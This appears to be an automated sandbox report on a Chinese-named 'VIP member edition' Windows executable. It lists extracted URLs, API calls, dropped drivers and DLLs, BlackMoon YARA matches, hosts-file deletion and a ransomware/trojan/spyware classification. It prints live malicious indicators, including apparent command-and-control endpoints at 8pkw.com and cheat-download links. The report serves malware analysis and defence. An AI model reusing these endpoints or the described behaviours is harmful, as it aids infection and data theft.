      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: http://th.symcd.com0&
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/api.php
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/api.php103M
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C43A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/api.php_ksreg_http://www2.8pkw.com/kss_api/api.php_ksreg_13_ksreg_1
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php.03M
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C492000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C450000.00000004.00001000.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C457000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C457000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&3
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C492000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&00
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C492000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&1
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.A3M2.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.GameM2.com
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.GeeM2.com
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.Haom6.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.Haom6.comhttp://www.GeeM2.comWemade
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.LongZuYQ.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.LongZuYQ.comgame
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.baidu.com/
      Source: D5AESTNHE.dll.2.drString found in binary or memory: http://www.eyuyan.com
      Source: D5AESTNHE.dll.2.drString found in binary or memory: http://www.eyuyan.comservice
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.iqiyi.com/
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.ksfm2.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.ksfm2.comwww.KKMir.comhttp://www.A3M2.com
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.m6dlq.com/
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.m6dlq.com/PEC2
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.qq.com/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.sina.com.cn/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.so.com/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.sogou.com/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.sohu.com/
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.xm2m2.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.xm2m2.comwww.Askm2.comShanghai
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www2.8pkw.com/kss_api/api.php
      Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
      Source: svchost.exe, 00000003.00000003.2098897424.000001E180C90000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comt
      Source: qmgr.db.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, DV95YAA3.htm.2.drString found in binary or memory: https://waigua.lanzn.com/b015nykd
      Source: D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://waigua.lanzn.com/b015nykdK
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://waigua.lanzn.com/b015nykdcss
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574077962.0000000007C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://waigua.lanzn.com/b015nykdp~
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4568816305.0000000006058000.00000004.00000800.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007D4D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, DV95YAA3.htm.2.drString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7%94%A8%E5%AE%A2%E6%9C%8D&Menu=yesp
      Source: D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7)
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D74
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7C
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7Q
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7b
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7u
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: https://www.thawte.com/cps0/
      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: https://www.thawte.com/repository0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_0BEB739C GetObjectA, GetDC, CreateCompatibleDC, CreateBitmap, CreateCompatibleBitmap, GetDeviceCaps, GetDeviceCaps, SelectObject, GetDIBColorTable, GetDIBits, SelectObject, CreateDIBSection, GetDIBits, SelectObject, SelectPalette, RealizePalette, FillRect, SetTextColor, SetBkColor, SetDIBColorTable, PatBlt, CreateCompatibleDC, SelectObject, SelectPalette, RealizePalette, SetTextColor, SetBkColor, BitBlt, SelectPalette, SelectObject, DeleteDC, SelectPalette
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_0BE9787E GetKeyboardState
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_6A6F823E GetKeyState, GetKeyState, GetKeyState, GetKeyState, SendMessageA

      Spam, unwanted Advertisements and Ransom Demands

      Source: Yara match; File source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, type: DROPPED
      Source: Yara match; File source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, type: DROPPED

      System Summary

      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, type: DROPPED; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, type: DROPPED; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
      Source: E875FIB50.dll.2.dr; Static PE information: .vmp0 and .vmp1 section names
      Source: C945E611y.dll.2.dr; Static PE information: Section: .text IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Process Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe; Memory allocated: 77030000 page execute and read and write
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe; Memory allocated: 75F80000 page execute and read and write
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Memory allocated: 77030000 page execute and read and write
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Memory allocated: 75F80000 page execute and read and write
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_0BE9773E NtdllDefWindowProc_A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_6A6DDBA0 ZwOpenProcess, ZwAllocateVirtualMemory, ZwAllocateVirtualMemory, ZwQuerySystemInformation, ZwQuerySystemInformation, ZwFreeVirtualMemory, ZwAllocateVirtualMemory, ZwQuerySystemInformation, ZwDuplicateObject, ZwQueryInformationProcess, ZwClose, ZwDuplicateObject, ZwClose, ZwFreeVirtualMemory
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_6A6DD8E0 RtlAdjustPrivilege, ZwOpenProcess, ZwOpenProcess, ZwAllocateVirtualMemory, ZwAllocateVirtualMemory, ZwQuerySystemInformation, ZwQuerySystemInformation, ZwFreeVirtualMemory, ZwAllocateVirtualMemory, ZwQuerySystemInformation, ZwOpenProcess, ZwDuplicateObject, ZwQueryInformationProcess, ZwDuplicateObject, ZwClose, ZwFreeVirtualMemory
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_00446798 NtdllDefWindowProc_A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_00443AA3 NtdllDefWindowProc_A, CallWindowProcA
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_0042FD40 NtdllDefWindowProc_A, NtdllDefWindowProc_A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Code function: 2_2_0BE972BE DeviceIoControl
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; File created: C:\Windows\SysWOW64\22FD558C8.sys
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; File created: C:\Windows\D74384F.sys
      Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; Registry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Privacy
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe; File deleted: C:\Windows\System32\drivers\etc\hosts
      Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Google\D74384FB8D2C9.exe A0C15F709E1B80E93A61CBA414E266097DC8C23A7E8DE2B6DBE825CA2952DF7E
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 00469760 appears 36 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 6A7017D4 appears 81 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 6A6FDA9D appears 48 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 6A703174 appears 69 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 0BE94C5C appears 79 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 6A6DAFE0 appears 50 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 0046FC88 appears 39 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 0046FD94 appears 37 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 6A6FDE00 appears 34 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: String function: 6A6FE0D8 appears 78 times
      Source: 5B38DA6A8.dll.2.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: B81BTTTQM.dll.2.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: C945E611y.dll.2.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
      Source: C945E611y.dll.2.dr | Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
      Source: D5AESTNHE.dll.2.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: Number of sections : 11 > 10
      Source: C945E611y.dll.2.dr | Static PE information: Number of sections : 11 > 10
      Source: VIP-#U4f1a#U5458#U7248.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, type: DROPPED | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, type: DROPPED | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
      Source: C945E611y.dll.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: C945E611y.dll.2.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: Section: 0DE ZLIB complexity 1.0002107998348018
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: Section: 10ta ZLIB complexity 1.0015345982142858
      Source: C945E611y.dll.2.dr | Static PE information: Section: .data ZLIB complexity 0.9888200431034483
      Source: C945E611y.dll.2.dr | Static PE information: Section: .reloc ZLIB complexity 0.999194995777027
      Source: FC14NMPKD.dll.2.dr | Binary or memory string: ...Slnt
      Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@4/42@20/16
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEB589C GetLastError,FormatMessageA
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6E00F0 OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,CloseHandle
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BE9BBAE GetDiskFreeSpaceA
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6E2640 CreateServiceA,GetLastError,CloseServiceHandle
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6DAFE0 CreateToolhelp32Snapshot,Process32First,Process32Next
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6D5440 CoCreateInstance,MultiByteToWideChar
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEAAC90 FindResourceA
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6E2680 OpenSCManagerA,CloseServiceHandle,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | File created: C:\Program Files (x86)\google\D74384FB8D2C9.exe
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | File created: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.lnk
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Mutant created: \Sessions\1\BaseNamedObjects\ini_read_write
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: D5AESTNHE.dll.2.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: D5AESTNHE.dll.2.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: D5AESTNHE.dll.2.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
      Source: D5AESTNHE.dll.2.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: D5AESTNHE.dll.2.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: D5AESTNHE.dll.2.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: D5AESTNHE.dll.2.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: VIP-#U4f1a#U5458#U7248.exe | ReversingLabs: Detection: 52%
      Source: D74384FB8D2C9.exe | String found in binary or memory: #-START-#
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | File read: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe
      Source: unknown | Process created: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe "C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe"
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Process created: C:\Program Files (x86)\Google\D74384FB8D2C9.exe "C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntO
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Process created: C:\Program Files (x86)\Google\D74384FB8D2C9.exe "C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntO
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: msimg32.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: oledlg.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: napinsp.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: pnrpnsp.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: wshbth.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: nlaapi.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: winrnr.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: linkinfo.dll
